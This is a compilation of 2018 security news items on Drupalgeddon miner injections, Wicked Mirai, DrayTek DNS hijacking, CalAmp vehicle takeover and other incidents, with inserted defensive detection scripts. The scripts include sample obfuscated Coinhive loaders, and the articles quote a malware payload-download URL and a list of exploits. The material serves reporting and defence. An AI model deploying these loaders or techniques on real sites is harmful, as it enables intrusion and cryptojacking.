The experts from Malwarebytes conducted an analysis of attacks involving Drupalgeddon2 and Drupalgeddon3 and discovered that most of the compromised Drupal sites had been running version 7.5.x, while roughly 30 percent had been running version 7.3.x, which was last updated in August 2015.

“Almost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in August 2015. Many security flaws have been discovered (and exploited) since then.” reads the analysis published by Malwarebytes.

More than 80 percent of the compromised websites had been serving web cryptocurrency miners; Coinhive injections remain by far the most popular choice, followed by public or private Monero pools.

“We collected different types of code injection, from simple and clear text to long obfuscated blurbs. It’s worth noting that in many cases the code is dynamic—most likely a technique to evade detection,” continues the report.

Roughly 12 percent of the attacks delivered RATs or password stealers disguised as web browser updates, while tech support scams accounted for nearly 7 percent of the client-side attacks.


Google awarded a young expert a total of $36,337 for an RCE in the Google App Engine
21.5.2018 securityaffairs Vulnerability

Google awarded the 18-year-old student Ezequiel Pereira a total of $36,337 for the discovery of a critical remote code execution vulnerability that affected the Google App Engine.
The Google App Engine is a framework that allows Google users to develop and host web applications on a fully managed serverless platform.

In February, Pereira gained access to a non-production Google App Engine development environment, then he discovered that it was possible to use some of Google’s internal APIs.

Pereira ethically reported the issue through Google’s Vulnerability Reward Program (VRP). The experts at Google ranked the flaw as a P1 priority, a level assigned to vulnerabilities that could have a significant impact on a large number of users and that for this reason must be addressed as soon as possible.

Meanwhile, Pereira continued his tests and submitted a second report to Google after discovering further issues; Google then invited Pereira to stop his activities because he could “easily break something using these internal APIs.”

Google’s security team determined that the flaw reported by the youngster could lead to remote code execution.

Pereira published a detailed analysis of his findings after Google had fixed them and awarded him.

“In early 2018 I got access to a non-production Google App Engine deployment environment, where I could use internal APIs and it was considered as Remote Code Execution due to the way Google works. Thanks to this I got a reward of $36,337 as part of Google Vulnerability Rewards Program.” reads the blog post published by the researcher.

“Some time ago, I noticed every Google App Engine (GAE) application replied to every HTTP request with a “X-Cloud-Trace-Context” header, so I assumed any website returning that header is probably running on GAE.
Thanks to that, I learned “appengine.google.com” itself runs on GAE, but it can perform some actions that cannot be done anywhere else and common user applications cannot perform, so I tried to discover how it was able to do those actions.
Obviously, it has to make use of some API, interface or something only available to applications ran by Google itself, but maybe there was a way to access them, and I looked for that.”

Below is the timeline for the flaw:

February 2018: Issue found
February 25th, 2018: Initial report (only the “stubby” API)
March 4th and 5th, 2018: The “app_config_service” API discovered and reported
March between 6th and 13th, 2018: Access to non-prod GAE environments was blocked with a 429 error page
March 13th, 2018: Reward of $36,337 issued
May 16th, 2018: Issue confirmed as fixed


Hacked Drupal Sites Deliver Miners, RATs, Scams
20.5.2018 securityweek Virus

The Drupal websites hacked by cybercriminals using the vulnerabilities known as Drupalgeddon2 and Drupalgeddon3 deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Two highly critical flaws were patched in recent months in the Drupal content management system (CMS). The security holes are tracked as CVE-2018-7600 and CVE-2018-7602, and they both allow remote code execution.

Malicious actors started exploiting CVE-2018-7600, dubbed Drupalgeddon2, roughly two weeks after a patch was released and shortly after a proof-of-concept (PoC) exploit was made public.

CVE-2018-7602, dubbed Drupalgeddon 3, was discovered during an analysis of CVE-2018-7600 by the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability. Hackers started exploiting CVE-2018-7602 immediately after the release of a patch.

Cybercriminals have exploited the vulnerabilities to hijack servers and abuse them for cryptocurrency mining. Some websites have been targeted by botnets known to also be involved in distributed denial-of-service (DDoS) attacks.

Researchers at security firm Malwarebytes recently conducted an analysis of client-side attacks involving Drupalgeddon2 and Drupalgeddon3, i.e. the threats pushed by the compromised sites to their visitors.

Experts noticed that nearly half of the hacked Drupal sites had been running version 7.5.x of the CMS, while roughly 30 percent had been running version 7.3.x, which was last updated in August 2015.

Unsurprisingly, more than 80 percent of the hacked sites had been serving cryptocurrency miners, mostly through Coinhive injections.

“We collected different types of code injection, from simple and clear text to long obfuscated blurbs. It’s worth noting that in many cases the code is dynamic—most likely a technique to evade detection,” researchers said in a blog post.
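Because the injected loaders vary from clear text to obfuscated blobs, a site operator checking pages for this kind of compromise needs to look past exact string or hash matching. The scanner below is an added example, not Malwarebytes' tooling or code from the report: it checks page content for Coinhive loader indicators in plain text and again after undoing three common JavaScript obfuscation idioms (base64 passed to atob, String.fromCharCode sequences, and %XX or \xNN escapes). The sample pages, the placeholder site key and the helper names are constructed for the example.

```python
import base64
import re

# Indicators tied to the Coinhive in-browser miner named in the report (matched lower-case).
MINER_INDICATORS = ("coinhive.com", "coinhive.min.js", "coinhive.anonymous")


def _decode_base64_runs(text):
    """Decode every long run of base64 alphabet, e.g. the argument of atob('...')."""
    for m in re.finditer(r"[A-Za-z0-9+/]{16,}={0,2}", text):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore")
        except ValueError:  # not valid base64 (binascii.Error is a ValueError)
            continue


def _decode_charcode_calls(text):
    """Rebuild strings assembled with String.fromCharCode(104,116,...)."""
    for m in re.finditer(r"fromCharCode\s*\(([\d\s,]+)\)", text):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        yield "".join(chr(c) for c in codes if c < 0x110000)


def _decode_hex_escapes(text):
    """Resolve %XX (unescape) and \\xNN escapes when the text contains a run of them."""
    if not re.search(r"(?:\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}){4,}", text):
        return
    yield re.sub(r"\\x([0-9a-fA-F]{2})|%([0-9a-fA-F]{2})",
                 lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def candidate_layers(html):
    """Yield (layer, text): the raw page plus each decoded form worth inspecting."""
    yield "plain", html
    for layer, decoder in (("base64", _decode_base64_runs),
                           ("fromCharCode", _decode_charcode_calls),
                           ("hex-escape", _decode_hex_escapes)):
        for decoded in decoder(html):
            yield layer, decoded


def find_miner_injections(html):
    """Return [(layer, indicator)] pairs found in the page, in discovery order without duplicates."""
    findings = []
    for layer, text in candidate_layers(html):
        low = text.lower()
        for indicator in MINER_INDICATORS:
            if indicator in low and (layer, indicator) not in findings:
                findings.append((layer, indicator))
    return findings


# Constructed sample pages. LOADER_JS is the kind of snippet an injection drops; the site key
# is a placeholder, not a real one.
LOADER_JS = ("var s=document.createElement('script');"
             "s.src='https://coinhive.com/lib/coinhive.min.js';document.head.appendChild(s);")
CLEAN_PAGE = "<html><body><h1>Welcome</h1><script src='/js/app.js'></script></body></html>"
PLAIN_INJECTION = ("<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
                   "<script>new CoinHive.Anonymous('SITEKEY-PLACEHOLDER').start();</script>")
BASE64_INJECTION = ("<script>eval(atob('%s'));</script>"
                    % base64.b64encode(LOADER_JS.encode()).decode())
CHARCODE_INJECTION = ("<script>eval(String.fromCharCode(%s));</script>"
                      % ",".join(str(ord(c)) for c in LOADER_JS))
HEX_INJECTION = ("<script>eval(unescape('%s'));</script>"
                 % "".join("%%%02x" % ord(c) for c in LOADER_JS))

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("plain", PLAIN_INJECTION),
                       ("base64", BASE64_INJECTION), ("charcode", CHARCODE_INJECTION),
                       ("hex", HEX_INJECTION)):
        print(name, "->", find_miner_injections(page))
```

Each finding records the layer at which the indicator surfaced, so a "base64" or "fromCharCode" hit on a page that has no plain-text Coinhive reference is itself a sign that someone went to the trouble of hiding the loader, which is the behaviour the report describes.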

Just over 12 percent of the attacks observed by Malwarebytes delivered RATs or password stealers disguised as web browser updates.

Tech support scams accounted for nearly 7 percent of the client-side attacks spotted by the security firm. In these attacks, website visitors are typically redirected to a page that locks their browser and instructs them to call a “tech support” number.

Malwarebytes says it has notified the organizations whose websites have been compromised.


Two Vulnerabilities Patched in BIND DNS Software
20.5.2018 securityweek Vulnerability

Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.

While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.

One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off,” ISC explained in an advisory. “Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.”

The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.

The second flaw, CVE-2018-5736, is also remotely exploitable, but only if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” ISC wrote. “This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

This vulnerability impacts BIND 9.12.0 and 9.12.1, and it has been patched in version 9.12.1-P1. However, users need to update to version 9.12.1-P2 as version 9.12.1-P1 was recalled before the public announcement due to a defect.

ISC support customers, including OEMs that re-package the organization’s open source code into commercial products, were notified about these vulnerabilities on May 9.

The latest version of BIND also includes a security improvement related to update-policy rules. ISC also noted that “named will now log a warning if the old root DNSSEC key is explicitly configured and has not been updated.”

This is the third round of security updates released for BIND this year. The first was released in mid-January and the second in late February. The February update impacted BIND Supported Preview Edition, but not any publicly released versions.


Judges convict crook of operating Scan4You Counter Antivirus Service
20.5.2018 securityaffairs Crime

A crook faces up to 35 years in prison for operating the popular Scan4You counter anti-virus (CAV) website that helped malware authors test the evasion capabilities of their code.
Scan4You was a well-known counter anti-virus (CAV) service used by malware developers.

Scan4You allowed vxers to check their malware against as many as 40 antivirus solutions.

Scan4You was probably the largest counter anti-virus website; it went offline in May 2017 after authorities arrested two men in Latvia, the Russian national Jurijs Martisevs (36) (aka “Garrik”) and Ruslans Bondars (37) (aka “Borland”).

Both suspects were extradited by the FBI to the United States.

Jurijs Martisevs was traveling to Latvia when he was arrested by authorities and in March he pleaded guilty in a Virginia court to charges of conspiracy and aiding and abetting computer intrusion.

On Wednesday, Bondars was found guilty of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“Ruslans Bondars helped hackers test and improve the malware they then used to inflict hundreds of millions of dollars in losses on American companies and consumers,” said John P. Cronan, Acting Assistant Attorney General of the Justice Department’s Criminal Division.

“Today’s verdict should serve as a warning to those who aid and abet criminal hackers: the Criminal Division and our law enforcement partners consider you to be just as culpable as the hackers whose crimes you enable—and we will work tirelessly to identify you, prosecute you, and seek stiff sentences that reflect the seriousness of your crimes.”

Bondars faces a maximum penalty of 35 years in prison when sentenced on September 21, 2018.

Scan4You was launched in 2009 with the intent to offer a service that helped malware developers to check evasion capabilities of their code.

For a monthly fee, malware authors could upload their samples to a service that tested their evasion capabilities against a broad range of anti-virus products.

The service was similar to the legitimate VirusTotal, with the difference that Scan4You did not share submissions with the security community.

“Scan4you differed from legitimate antivirus scanning services in multiple ways. For example, while legitimate scanning services share data about uploaded files with the antivirus community and notify their users that they will do so, Scan4you instead informed its users that they could upload files anonymously and promised not to share information about the uploaded files with the antivirus community.” continues the DoJ.

According to the DoJ, crooks used Scan4You’s services to test the infamous Citadel malware that was used in the cyber attack against the retail giant Target.

Even though Scan4You was taken offline, crooks have other ways to test their malware before spreading it in the wild. Law enforcement must remain vigilant to prevent the growth of other similar services.


Chrome evolves security indicators by marking with a red warning for HTTP content
20.5.2018 securityaffairs Security

Starting with Chrome 70, Google will mark HTTP content with a red warning, continuing its effort to make the web more secure.
Since January 2017, Chrome has indicated connection security with an icon in the address bar, labeling HTTP connections to sites as non-secure, and since May 2017 Google has been marking newly registered sites that serve login pages or password input fields over HTTP as not secure.

As of May 2018, the overall share of encrypted traffic across several Google products is more than 93%.

“Security is a top priority at Google. We are investing and working to make sure that our sites and services provide modern HTTPS by default. Our goal is to achieve 100% encryption across our products and services. The chart below shows how we’re doing across Google.” reads the Google Transparency report.

This is an important success for Google, considering that in early 2014 only 50% of the traffic was encrypted.

According to the Google Transparency report, around 75% of the pages loaded via Chrome early May 2018 were served over secure HTTPS connections, while in 2014 the percentage was only around 40%.

Google now plans to mark unencrypted connections with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” reads a blog post published by Google.

Chrome 70 treatment for HTTP pages with user input

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities — so don’t wait to migrate to HTTPS! Check out our set-up guides to get started.” explained Emily Schechter, Product Manager, Chrome Security.


Updated – The new Wicked Mirai botnet leverages at least three new exploits
20.5.2018 securityaffairs BotNet

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’; it includes new exploits and spreads a new bot.
The name Wicked Mirai comes from strings in the code; the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including Satori, Masuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute-force attempts to compromise other IoT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit used depends on the specific port the bot was able to connect to. Below is the list of devices targeted by the Wicked Mirai:

Port 8080: Netgear DGN1000 and DGN2200 v1 routers (also used by Reaper botnet)
Port 81: CCTV-DVR Remote Code Execution
Port 8443: Netgear R7000 and R6400 Command Injection (CVE-2016-6277)
Port 80: Invoker shell in compromised web servers
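From a network defender's side, the scanning behaviour described above (raw SYN probes across 8080, 8443, 80 and 81 against many neighbouring hosts) is itself a detectable signal. The script below is an added example, not Fortinet's code: it runs over a constructed connection log, flags a source that probes several distinct hosts on those four ports within a short window, and separately flags any host that contacts the payload server address quoted in the Fortinet analysis (defanged there as 185[.]246[.]152[.]173). The log format, the thresholds and the sample addresses are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Ports Wicked Mirai probes, per the Fortinet analysis.
IOT_SCAN_PORTS = {80, 81, 8080, 8443}
# Payload host named in the Fortinet write-up (quoted in the article in defanged form).
PAYLOAD_HOST = "185.246.152.173"

# Assumed log format: "<ISO timestamp> <SYN|CONNECT> <src> -> <dst>:<port>".
LINE_RE = re.compile(r"^(\S+) (SYN|CONNECT) (\S+) -> (\S+):(\d+)$")


def parse_line(line):
    """Return (timestamp, kind, src, dst, port) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group(2), m.group(3), m.group(4), int(m.group(5))


def detect(lines, window_seconds=60, min_targets=5):
    """Return (kind, source, first_seen) alerts for IoT port sweeps and payload-host contacts."""
    alerts = []
    probes = defaultdict(list)  # src -> [(ts, dst)] for connections on the IoT ports
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, _kind, src, dst, port = rec
        if dst == PAYLOAD_HOST:
            alerts.append(("payload-host-contact", src, ts))
        if port in IOT_SCAN_PORTS:
            probes[src].append((ts, dst))
    window = timedelta(seconds=window_seconds)
    for src, events in probes.items():
        events.sort()
        left = 0
        for right in range(len(events)):
            # Sliding window: drop events older than window_seconds before events[right].
            while events[right][0] - events[left][0] > window:
                left += 1
            targets = {dst for _, dst in events[left:right + 1]}
            if len(targets) >= min_targets:
                alerts.append(("iot-port-sweep", src, events[left][0]))
                break
    return alerts


# Constructed sample log: one sweeping host, one victim fetching the payload, one benign client.
SAMPLE_LOG = """\
2018-05-17T10:00:00Z SYN 198.51.100.7 -> 192.0.2.10:8080
2018-05-17T10:00:02Z SYN 198.51.100.7 -> 192.0.2.11:8443
2018-05-17T10:00:04Z SYN 198.51.100.7 -> 192.0.2.12:80
2018-05-17T10:00:06Z SYN 198.51.100.7 -> 192.0.2.13:81
2018-05-17T10:00:08Z SYN 198.51.100.7 -> 192.0.2.14:8080
2018-05-17T10:00:10Z SYN 198.51.100.7 -> 192.0.2.15:8443
2018-05-17T10:00:15Z CONNECT 192.0.2.12 -> 185.246.152.173:80
2018-05-17T10:00:20Z SYN 198.51.100.20 -> 192.0.2.30:443
2018-05-17T10:00:25Z SYN 198.51.100.20 -> 192.0.2.31:80
""".splitlines()

if __name__ == "__main__":
    for kind, src, first_seen in detect(SAMPLE_LOG):
        print(kind, src, first_seen.isoformat())
```

The sweep rule keys on distinct destinations rather than raw connection counts, so a busy client talking to one web server on port 80 does not trip it, while a bot walking a subnet on the four ports does; the payload-host rule is the simpler indicator match and fires regardless of port.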
The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation contradicted this hypothesis: the bot actually connects to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found an interview with the Owari/Sora IoT botnet author dating back to April.

The vxer, who goes by the online handle “Wicked,” said at the time that he had abandoned the Sora botnet and was working on the Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Update May 19, 2018 – Speaking with MalwareMustDie
I have contacted Malware Must Die for a comment on the Wicked Mirai botnet.

Below are the observations he shared with me:

Same coder.
The author put all of the high-possibility exploit code in Mirai
GPON seemed to be used in a separate pwn scheme by a different script outside of Mirai, but was being used to infect Mirai.
MalwareMustDie researchers told me that they passed the identity of the author to the related country LEA. They explained to me that even though they made several reports to the authorities, law enforcement failed to prevent the diffusion of the malicious code. The experts showed me an official report to LEA dating back to January 2018, when they alerted authorities to the propagation of new Mirai variants.

“the ID of the actor was passed to the related country LEA from our team that investigated result too since we published the Satori/Okiru variant a while ago, way before ARC CPU variant was spotted.” MMD told me.

“So by the release of the OWARI, SORA, and WICKED, this is what will happen if we let the malware actor running loose unarrested. More damage will be created and they just don’t know how to stop them self.”


Experts propose a new variation of the Spectre attack to recover data from System Management Mode
20.5.2018 securityaffairs Attack

Researchers from Eclypsium proposed a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode.
Security experts from Eclypsium have devised a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode (SMM), also known as ring -2.

The SMM is an operating mode of x86 CPUs in which all normal execution, including the operating system, is suspended.

When the CPU enters SMM, the operating system is suspended and a portion of the UEFI/BIOS firmware executes with elevated privileges and with access to all the data and hardware.

“The main benefit of SMM is that it offers a distinct and easily isolated processor environment that operates transparently to the operating system or executive and software applications.” reads Wikipedia.

SMM was first introduced with the Intel 386SL in the early 90s. Intel CPUs implement a memory protection mechanism known as range registers to protect sensitive memory regions such as SMM memory.

SMM memory on Intel CPUs is protected by a special type of range registers known as System Management Range Register (SMRR).

Eclypsium experts based their study on public proof-of-concept code for the Spectre variant 1 (CVE-2017-5753) vulnerability to bypass the SMRR mechanism and access the content of System Management RAM (SMRAM), which holds the SMM code and its working data.

“Because SMM generally has privileged access to physical memory, including memory isolated from operating systems, our research demonstrates that Spectre-based attacks can reveal other secrets in memory (eg. hypervisor, operating system, or application).” states the report published by Eclypsium.

“These enhanced Spectre attacks allow an unprivileged attacker to read the contents of memory, including memory that should be protected by the range registers, such as SMM memory. This can expose SMM code and data that was intended to be confidential, revealing other SMM vulnerabilities as well as secrets stored in SMM.”

The experts ported the PoC code to a kernel driver and demonstrated that it works from the kernel privilege level. They then ran the exploit code from the kernel privilege level against protected memory.

“The kernel-level PoC exploit provides access to different hardware interfaces, which gives attackers better control over the system hardware and access to different hardware interfaces such as physical memory, IO, PCI, and MMIO interfaces. It also provides access to interfaces at a higher privilege level, such as software SMI.” explained the researchers.

“Next, we integrated the PoC exploit into CHIPSEC in order to quickly expand our tests. In our first experiment, we tried to read protected SMRAM memory. We mapped the physical addresses of SMRAM into the virtual address space and then used the SMRAM addresses as the target of our exploit.”

The experts believe that Spectre variant 2 (CVE-2017-5715) can also achieve the same results.

Eclypsium reported the new attack technique to Intel in March. Intel replied that the security updates released for the Spectre variant 1 and variant 2 should be enough to mitigate this new attack.


Misconfigured CalAmp server allowed hacker to take over a lot of vehicles
20.5.2018 securityaffairs Hacking

Security researchers discovered that a misconfigured server operated by the CalAmp company could allow anyone to access account data and take over the associated vehicle.
CalAmp is a company that provides backend services for several well-known systems.

Security researchers Vangelis Stykas and George Lavdanis discovered that a misconfigured server operated by the CalAmp company could allow anyone to access account data and take over the associated vehicle.

The experts were searching for security vulnerabilities in the Viper SmartStart system, a device that allows users to remotely start, lock, unlock, or locate their vehicles directly using a mobile app on their smartphones.

As with many other mobile applications, it used SSL connections with certificate pinning (the certificate known to be used by the server is hard-coded in the client), so that connections to sites offering bogus SSL certificates are automatically rejected.

The experts noticed that the app was connecting to the mysmartstart.com domain and also to a third-party domain (https://colt.calamp-ts.com/), the frontend of the Calamp.com Lender Outlook service.

The experts discovered that, using the credentials of the user created through the Viper app, it was possible to log in to the panel.

“This panel seemed to be the frontend for Calamp.com Lender Outlook service. We tried our user created from the viper app, to login and it worked!” reads the blog post published by Stykas.

“This was a different panel which seemed to be targeted to the companies that have multiple sub-accounts and a lot of vehicles so that they can manage them.”


Further tests showed that the portal itself was properly secured, but during the assessment the experts discovered that the reports were delivered by a separate dedicated server running TIBCO JasperReports software.

The experts had never analyzed this type of server before, so they had to improvise; after removing all request parameters they found that they were already logged in as a user with limited rights but with access to a large number of reports.

“None of us were familiar with that so we had to improvise. Removing all the parameters we found out that we were already logged in with a limited user that had access to A LOT of reports.” continues the report.

“We had to run all those reports for our vehicles right? Well the ids for the user was passed automatically from the frontend but now we had to provide them from the panel as an input. And…well…we could provide any number we wanted.”

The researchers gained access to all the reports for all the vehicles (including location history), as well as to the report data sources, which listed usernames (the passwords were masked and could not be exported).

The server also allowed copying and editing of any existing report.

“We could not create a report or an adhoc or pretty much anything else, but we could copy paste existing ones and edit them so we can do pretty much anything. We could also edit the report and add arbitrary XSS to steal information but this was not something that we (or anyone in their right lawful mind) would want to do.” continues the report.

Since all production databases were present on the server, including CalAmp connect device outlook, the researchers were able to take over a user account via the mobile application. An attacker who knows an older password for the account can simply walk to the car, unlock it, start the engine, and possibly steal the vehicle.

According to the experts the exploitation of the flaw could allow:

Well the very obvious just change the user password to a known one go to the car, unlock, start and leave.
Get all the reports of where everyone was
Stop the engine while someone was driving ?
Start the engine when you shouldn’t.
Get all the users and leak.
As we haven’t actually seen the hardware we might be able to pass can bus messages though the app ?
Get all the IoT devices from connect database or reset a password there and start poking around.
Really the possibilities are endless…

The experts reported the issue to CalAmp at the beginning of May 2018, and the company addressed the flaw in ten days.


More than 800,000 DrayTek routers at risk due to a mysterious zero-day exploit
19.5.2018 securityaffairs Exploit

DrayTek routers are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some models.
Routers manufactured by the Taiwan-based vendor DrayTek are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some of its routers.

DrayTek confirmed that it is aware of hackers attempting to exploit the zero-day vulnerability to compromise its routers.

Many users reported on Twitter attacks against their routers; in these cases, the attackers changed the routers' DNS settings to point to a server with the IP address 38.134.121.95, on the network of China Telecom.

The attackers are likely using the rogue DNS server to conduct man-in-the-middle attacks, redirecting users to bogus clones of legitimate sites in order to steal their credentials.


DrayTek published a security advisory warning of the attacks and providing instructions on how to check and correct DNS settings.

“In May 2018, we became aware of new attacks against web-enabled devices, which includes DrayTek routers. The recent attacks have attempted to change DNS settings of routers.” reads the security advisory.

“If you have a router supporting multiple LAN subnets, check settings for each subnet. Your DNS settings should be either blank, set to the correct DNS server addresses from your ISP or DNS server addresses of a server which you have deliberately set (e.g. Google 8.8.8.8). A known rogue DNS server is 38.134.121.95 – if you see that, your router has been changed.”

The company is already working on firmware updates to patch the issue.

DrayTek published a second advisory that lists the affected devices and the firmware versions it is going to release in the coming days.

Initially, the company suspected that the victims of the attacks were using DrayTek routers with default credentials, but one of them clarified that their device was not using factory settings, a circumstance that confirms that the attackers are in possession of a zero-day exploit.
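The check DrayTek's advisory describes (inspect the resolvers of every LAN subnet, accept only blank, ISP-assigned or deliberately chosen servers, and treat 38.134.121.95 as a confirmed hijack) can be automated over an exported configuration. The following is an added example, not DrayTek's tooling: the configuration is modelled as a plain dict, the ISP resolver addresses and the WAN-management flag are placeholder values, and only the rogue address comes from the advisory. The remote-admin check reflects the common factor noted in the reports below, that WAN-side management was enabled on the compromised routers.

```python
"""Check exported router DNS settings for the hijack described above.

Added example, not DrayTek's own tooling.  The router configuration is
modelled as a plain dict such as an export from the admin UI would give;
the ISP resolvers and the WAN-management flag are placeholder values.
The rogue resolver address is the one named in DrayTek's advisory.
"""
import ipaddress

ROGUE_DNS = {"38.134.121.95"}               # from the DrayTek advisory
ISP_DNS = {"203.0.113.53", "203.0.113.54"}  # placeholder: your ISP's resolvers
# Public resolvers an administrator may have set deliberately (the advisory
# gives Google 8.8.8.8 as its example).
DELIBERATE_DNS = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "9.9.9.9"}

# Constructed sample export: three LAN subnets, one of them hijacked, plus
# WAN-side management left enabled.
SAMPLE_CONFIG = {
    "dns": {
        "LAN1": ["", ""],                        # blank: uses ISP-assigned resolvers
        "LAN2": ["38.134.121.95", "8.8.8.8"],    # first resolver replaced by the rogue one
        "LAN3": ["203.0.113.53", "198.51.100.7"],
    },
    "wan_management_enabled": True,
}


def check_dns(dns_by_subnet, isp=ISP_DNS, deliberate=DELIBERATE_DNS):
    """Return (subnet, server, reason) for every resolver that is not blank,
    not an ISP resolver and not a deliberately configured public one.

    A known rogue server is reported with its own reason so it can be
    prioritised; every subnet is checked, as the advisory recommends.
    """
    findings = []
    for subnet, servers in dns_by_subnet.items():
        for server in servers:
            if not server:
                continue                         # blank is fine
            try:
                ipaddress.ip_address(server)
            except ValueError:
                findings.append((subnet, server, "not an IP address"))
                continue
            if server in ROGUE_DNS:
                findings.append((subnet, server, "known rogue DNS server"))
            elif server not in isp and server not in deliberate:
                findings.append((subnet, server, "unexpected DNS server"))
    return findings


def check_remote_admin(config):
    """True when management is reachable from the WAN side, the common
    factor noted in the reports of compromised routers."""
    return bool(config.get("wan_management_enabled"))


def assess(config):
    """Combine both checks into one verdict for a configuration export."""
    dns_findings = check_dns(config["dns"])
    return {
        "hijacked": any(r == "known rogue DNS server" for _, _, r in dns_findings),
        "dns_findings": dns_findings,
        "wan_management_exposed": check_remote_admin(config),
    }


if __name__ == "__main__":
    for key, value in assess(SAMPLE_CONFIG).items():
        print(f"{key}: {value}")
```

An "unexpected DNS server" finding is not proof of compromise (it may be a resolver the administrator chose), which is why it is reported separately from the rogue address; the ISP and deliberate sets should be filled in for the network being checked.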

Kevin Beaumont

@GossiTheDog
Reports coming in DrayTek routers are being mass hacked and DNS servers changed on them (allows traffic redirection and MITM attacks). https://twitter.com/adamitec/status/997237081461133312 …

11:35 AM - May 18, 2018

Kevin Beaumont

@GossiTheDog
😢 pic.twitter.com/xMXak22JNG

11:37 AM - May 18, 2018

Kevin Beaumont

@GossiTheDog
The running theme so far is remote admin (WAN mgmt) is enabled (on by default) but password had been changed. Either going to be brute force or exploit.

1:24 PM - May 18, 2018

A Shodan search for DrayTek routers returns more than 800,000 devices connected online, some of which could potentially be compromised with the mysterious exploit.


200 Million Sets of Japanese PII Emerge on Underground Forums
19.5.2018 securityweek Incident

A dataset allegedly containing 200 million unique sets of personally identifiable information (PII) exfiltrated from several popular Japanese website databases emerged on underground forums, FireEye reports.

Advertised by a Chinese threat actor at around $150, the dataset contained names, credentials, email addresses, dates of birth, phone numbers, and home addresses, and was initially spotted in December 2017.

The data appears sourced from a variety of Japanese websites, including those in the retail, food and beverage, financial, entertainment, and transportation sectors, and FireEye believes that the cybercriminals obtained it via opportunistic compromises.

The data, which the security researchers believe to be authentic, appears to have been acquired between May and June 2016, though data in one folder suggests some of it was obtained in May and July 2013, FireEye explains in a report shared with SecurityWeek.

Apparently, several actors commented on the advertisement, saying they were interested in purchasing the dataset, but they also provided negative feedback, claiming they did not receive the advertised product.

